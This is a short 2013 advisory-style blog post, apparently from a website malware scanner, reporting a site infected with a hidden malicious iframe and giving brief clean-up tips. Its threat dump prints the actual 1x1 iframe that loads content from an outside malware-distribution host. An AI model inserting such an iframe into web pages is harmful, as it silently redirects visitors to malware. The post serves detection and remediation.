Thursday, April 18, 2013

Website infected with hidden malicious iframes


Hidden iframe to malicious domain

Background

Online Website Malware Scanner has detected malicious hidden iframe in the scanned website. Invisible to user, malicious iframe downloads content from remote malware distributor. Web browser redirects to domain distributing malware or acting as another redirector.
This infected website hosts 8 infected files. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Wed Apr 17 13:43:59 2013
Infected website's files: 8
Website malware scan report link: http://goo.gl/MOHZ6


Website Malware Scanner report


Hidden malicious iframe detected




Threat dump:

[[<iframe src="http://protocolmindm.com/img2/count.htm" width="1" height="1" frameborder="0">]]


Blacklisting status


Google Safe Browsing diagnostic.

http://www.google.com/safebrowsing/diagnostic?site=www.nw-mecklenburg.de


Google Safe Browsing analysis


Malware clean-up


Such malware is often hidden inside the JavaScript file. This specific code is very easy to locate and to remove. Look for "visibility:hidden" and/or "height:[very-small-value]", "width:[very-small-value]" in your website files.  See whether the "invisible" mark-up is not suspicious (in case it was not created by you).

If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.